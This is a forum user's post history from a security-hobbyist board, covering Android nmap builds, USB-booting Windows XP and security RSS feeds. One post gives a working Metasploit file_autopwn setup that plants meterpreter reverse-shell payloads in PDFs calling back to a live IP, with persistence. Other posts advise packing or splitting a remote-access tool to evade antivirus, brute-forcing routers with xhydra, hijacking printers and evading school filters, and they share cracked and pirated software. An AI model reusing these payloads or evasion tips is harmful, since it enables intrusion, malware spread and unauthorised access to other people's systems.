operat0r_001
-
Posts
327 -
Joined
-
Last visited
-
Days Won
1
Posts posted by operat0r_001
-
-
example output: http://rmccurdy.com/scripts/msf_shells/
Metasploit auxilary file_autopwn module - Video Tutorial
http://www.backtrack-linux.org/forums/back...o-tutorial.html
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases...es/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
# setting the LHOST to non IP can cause issues
setg LHOST 75.139.158.51
setg LPORT 21
# I just need the files I dont care if the http server ever runs ..
setg SRVPORT 21
# defualt is 3333
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run
-
Let me know if you need any help rmccurdy.com runs FreeBSD .. openbsd is good for firewalls/vpn etc
-
I dont play any of them .. everybody cheats in thos ..
-
My personal wordlist :)
ADDED 2.3GIG wordlist
* theargonlistver2_wordlist.zip (83meg) > .rar(154meg) > .lst ( plan text 1.9gigs)
* ran john on it and sort and uniq
* results in 2.3G wordlist no dupes
* DOWNLOAD:
-
first off it needs to run as system ... so you would need to use something like "
http://rmccurdy.com/scripts/procexp%20as%20system.exe
or
http://rmccurdy.com/scripts/RUNAS_SYSTEM.vbs ( xp )
I would startover and use something like getcountermeasure script and work backward to a .bat:
http://www.google.com/search?q=metasploit++getcountermeasure
http://rmccurdy.com/scripts/quickclean.txt ( some M$ batch foo )
-
NMAP FOR ANDROID CROSS COMPILE ARM
# from android root prompt
wget http://rmccurdy.com/nmap.sh
sh nmap.sh
cd /data/local/bin
nmap -v -iR 50 -PN -p 80 -n -A
This MAY work for other platforms but tested on cygonmod as of 2/18/2010 on
Android G1 plan to APK package this up with other security tools
ruby/metasploit etc ..
• SYN scans may not REALLY be working … along with other ‘features’ of nmap ..
• Copy eveything in http://rmccurdy.com/stuff/G1/BINS/NMAP/ to
/data/local/bin on the Android and cd /data/local/bin
• You may need to ‘mount -o remount / /` and put sh or bash ( the busybox bash ) in /bin/sh
• Or alternative export SHELL=/system/bin/sh may work ..
• http://delicious.com/operat0r/android reference
• Some tips for cross compiling:
- Start with simple! bash or ‘hello world’
- Make sure the file is ARM / STATIC
nmap: ELF 32-bit LSB executable, ARM, version 1 (SYSV), for GNU/Linux 2.6.14, statically linked, not stripped
- If you get ‘not found’ it may be the /bin/sh issue or missing libs
- You can use strace and gdb from my site or http://ortegaalfredo.googlepages.com/android
-
For nmap and others I had to pre compile the libs and or hack up the
configure and/or make file so if something fails try to compile each
lib in the folder take it folder by folder
EXAMPLE OUTPUT:
uname -a
Linux localhost 2.6.29.6-cm42 #11 PREEMPT Sun Jan 3 23:10:50 EST 2010 armv6l GNU
/Linux
#
Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2010-02-18 19:04 UTC
Warning: OS detection will be MUCH less reliable because we did not find at lea
st 1 open and 1 closed TCP port
Interesting ports on diecastaircraftshop.com (63.249.18.249):
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
25/tcp open smtp?
80/tcp open http Microsoft IIS webserver 7.0
443/tcp open https?
Device type: general purpose
Running (JUST GUESSING) : FreeBSD 5.X (85%)
Aggressive OS guesses: FreeBSD 5.3-STABLE (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime 43.977 days (since Tue Jan 5 19:39:44 2010)
Service Info: OS: Windows
Nmap finished: 1 IP address (1 host up) scanned in 141.397 seconds
#
MINI HOWTO:
# you need sun-java5-jdk
echo 'deb http://us.archive.ubuntu.com/ubuntu/ jaunty multiverse' >> /etc/apt/sources.list
echo 'deb http://us.archive.ubuntu.com/ubuntu/ jaunty-updates multiverse ' >> /etc/apt/sources.list
apt-get update
apt-get install build-essential -y
apt-get install m4 -y
aptitude install git-core git jfsutils xfsprogs quota isdnutils-base nfs-common oprofile -y
apt-get install sun-java5-jdk -y
# toolchain for cross compile
http://zenmachine.wordpress.com/cross-comp...not-so-zen-way/
http://android-dev.g.hatena.ne.jp/takuma104/
# download nmap-4.01.tar.gz
# precompile dftables cd ./libpcre/ ; ./configure ; make;cp dftables /usr/local/sbin/
# make clean and cp /usr/local/sbin/dftables ./libpcre/
# precompile libpcap I got libpcap-0.7.1 to compile OK for AM '
--with-libpcap=/home/operat0r/libpcap-0.7.1/ ' change to your path
# before you make vi the Main Make file to STATIC = -static
# my last line after make looked like:
arm-none-linux-gnueabi-g++ -Llibpcap -Lnbase -Lnsock/src/ -static -o nmap main.o
nmap.o targets.o tcpip.o nmap_error.o utils.o idle_scan.o osscan.o
output.o scan_engine.o timing.o charpool.o services.o protocols.o
nmap_rpc.o portlist.o NmapOps.o TargetGroup.o Target.o
FingerPrintResults.o service_scan.o NmapOutputTable.o MACLookup.o tty.o
nmap_dns.o -lnbase -lnsock libpcre/libpcre.a -lpcap
libdnet-stripped/src/.libs/libdnet.a -lm
export ac_cv_linux_vers=2.6.31
export CC=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-gcc -static
export LD=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ld
export AR=/usr/local/arm-2008q3/bin/arm-none-linux-gnueabi-ar
export RANLIB=/usr/local/arm-2008q3/arm-none-linux-gnueabi/bin/ranlib
export PATH=$PATH:/usr/local/arm-2008q3/bin
export PATH=$PATH:/usr/local/arm-2008q3/
export PATH=$PATH:/usr/local/arm-2008q3/lib
export ac_cv_func_getpgrp_void=yes
export ac_cv_func_setpgrp_void=yes
./configure --host=arm-none-linux-gnueabi --target=arm-none-linux-gnueabi
--with-libpcap=/home/operat0r/libpcap-0.7.1/ --without-nmapfe
--with-pcap=linux
-
-
Video Download Capture portable
Replay Media Catcher portable
MediaCoder portable
http://rapidshare.com/files/335751302/Vide....0_portable.exe
http://rapidshare.com/files/336245780/Repl...tcher_v3.11.zip
http://rapidshare.com/files/338371999/Medi...82_portable.exe
ready for USB 1337ness
-
No and no ?? its not a theory ... usboot.org .. you would only need to remember WPA key and if you and the WGA can be crack easy this has been tested on 4 different desktop and 5 different laptops I can only assume you need to keep the original IMAGE because its installing drivers every time you change the system and I assume that would cause problems eventually but none for me so far I got a blue screen but it worked fine on reboot for one of the desktops
-
* dont patch the wii !
* find out what version you got 4.2 I am running
* http://delicious.com/operat0r/wii
http://rmccurdy.com/stuff/wii2/ for 4.2 .. this will give you an idea .. of what you need
http://rmccurdy.com/stuff/wii older wii stuff
be sure to also add the Preloader for if and WHEN you brick your wii :)
-
windows XP SP3 installed to USB usboot with NIC and WIFI driverpacks
*** THIS IS NOT BART,ERD OR UBCD4WIN ETC THIS IS A REAL FULL XP PRO SP3 INSTALLED AND BOOTING FROM USB DRIVE ***
This is working and tested USB boot image using partimage
* get a 4gig or higher usb drive
* download RMPrepUSB and format fat32 with boot
* make sure you can boot from the USB device
* extract the zip using 7-zip.org etc
* use partimage to dump the ~2 gig image to the usb drive etc
* http://www.sysresccd.org/Screenshots for partimage if you do not have it also on Backtrack or any number of live linux distros
this is how I did it thank usboot.org
* the host mashine MUST have NFTS partiton on it for this to work it uses drive shadowning etc to clone the C:
* made sure the USB drive was bootable
* formated the USB drive FAT32 not on VMware but on the host mashine
* did base install of my windows XP with driverpacks on a VM
* extract the NIC and WIFI drivers from driverpacks.net
* ran phase 1-3 ok on the VM
* you can even put this on cell phone and boot windows from minisd etc .. :)
* the image can be pushed and booted in under 4min on a USB or HDD for a quick hack
rmccurdy.com/usboot.txt
-o p r e a t 0 r - r m c c u r d y . c o m
-
* try a different box
* buy some contact cleaner itsl ike WD-40 but for tronics :)
* http://delicious.com/operat0r/backtrack ( look for USB )
-
random psycho babble
* not sure but something about flash media over say 8gigs is 'different' maybe <8 is flash and >8 is 'removal disk' I just have had issues with boot/etc with larger flash drives
* as far as USB forensics for windows I use HandyRecovery.exe GetDataBack for NTFS portable.exe GetDataBack for FAT portable.exe (PhotoRec - CGSecurity)
* also look into dd_rhelp but normally flash works or does not so its more a matter of what tools to aim at it then reading from it with IDE/SATA you can buy PCI cards that can read at a lower level
* for more info pop it in a *nix box and google the device is picksup
to answer your Q: lookinto WMI you can monitor and query event logs etc anything ... you could
-
you can do this with ping yahoo.com and error levels ( exit codes for *nix users )
http://www.robvanderwoude.com/errorlevel.php
:loop
Timeout.exe 30
ping yahoo.com
if errorlevel 1 goto restartvnc
Timeout.exe 30
goto loop
something like that
-
if the ssid is the same as factory defualt likly he has never even logged into it .. if not default try xhydra and friends to brute force it with a small wordlist
-
-
noobs
http://74.125.47.132/search?q=cache:f8ldos...lient=firefox-a
I rember a article about Macs and HID on flash drive allowing FORCE autorun type of shanagins ?? is there such a thing for windows ? "not autorun.inf
-
just google rat or "remote access tool" also google on splitting files to circumvent malware scanners or ( packers ) or just write your own using MSF and bundle it with something
-
Hijetter.exe great for open HP printers :)
* replace the error message with "please deposit $.25 to complete print job"
-
this is a retarded thread ... and I am hijacking it to replace it with useful info ..:
* http://www.wpacracker.com/cracker/upload
* http://cracker.offensive-security.com/
* http://www.md5decrypter.co.uk/
* http://www.freerainbowtables.com/en/download/
* http://rmccurdy.com/scripts/packetstorm_dic_john_1337.tar.gz
* http://forums.remote-exploit.org/pentestin...e-wordlist.html
-
goto my site play with the portable download :) skiddie powers activate ! learn a programing lang the rest will come
-
giganews/ssl + truecrypt = DONE
15$ a month charge it to yer moms CC
-
Episode 6x14
in Hak5
you need to say something about DNS .. most school bloc via DNS so you can tunnel all you want .. dns still goes over local LAN.
* about:config fwd dns
* also say something about portaputty and portable firefox
-
11/12/2009 - UPDATED/FIXED feeds.rmccurdy.com - 30 feeds ( to be added secunia.com if I can )
http://www.securityfocus.com/rss/vulnerabilities.xml
http://seclists.org/rss/bugtraq.rss
http://seclists.org/rss/fulldisclosure.rss
http://seclists.org/rss/pen-test.rss
http://seclists.org/rss/incidents.rss
http://seclists.org/rss/dailydave.rss
http://seclists.org/rss/webappsec.rss
http://seclists.org/rss/vulnwatch.rss
http://feeds.feedburner.com/HelpNetSecurity
http://www.us-cert.gov/channels/alerts.rdf
http://www.us-cert.gov/channels/techalerts.rdf
http://www.kb.cert.org/vuls/atomfeed?OpenV...=1&count=30
http://www.net-security.org/dl/bck/vuln.rss
http://news.securitytracker.com/server/aff...1D319BD39309004
http://feeds.feedburner.com/darknethackers
http://feeds.feedburner.com/schneier/fulltext
http://www.professionalsecuritytesters.org/backend.php
http://www.f-secure.com/weblog/weblog.rss
http://www.gossamer-threads.com/lists/full...-disclosure.xml
http://feeds.feedburner.com/Vitalsecurity-org
http://taosecurity.blogspot.com/feeds/posts/default
http://securityvulns.com/informer/rss.asp
http://www.vupen.com/exploits.xml
http://osvdb.org/feed/vulnerabilities/latest.rss
http://rmccurdy.com/scripts/vupen-security.rss
http://rmccurdy.com/scripts/vupen-linux.rss
http://feeds.feedburner.com/SansInstituteA...kAll?format=xml
http://feedity.com/rss.aspx/ath-cx/UldUWlFU
http://www.securinfos.info/english/securit...-advisories.xml
Force Applications To Use A Proxy
in Questions
Posted
set IE proxy settings that will do for most apps ... they use the API or whatnot for IE other then that you will need to setup a transparent proxy google "squid transparent proxy"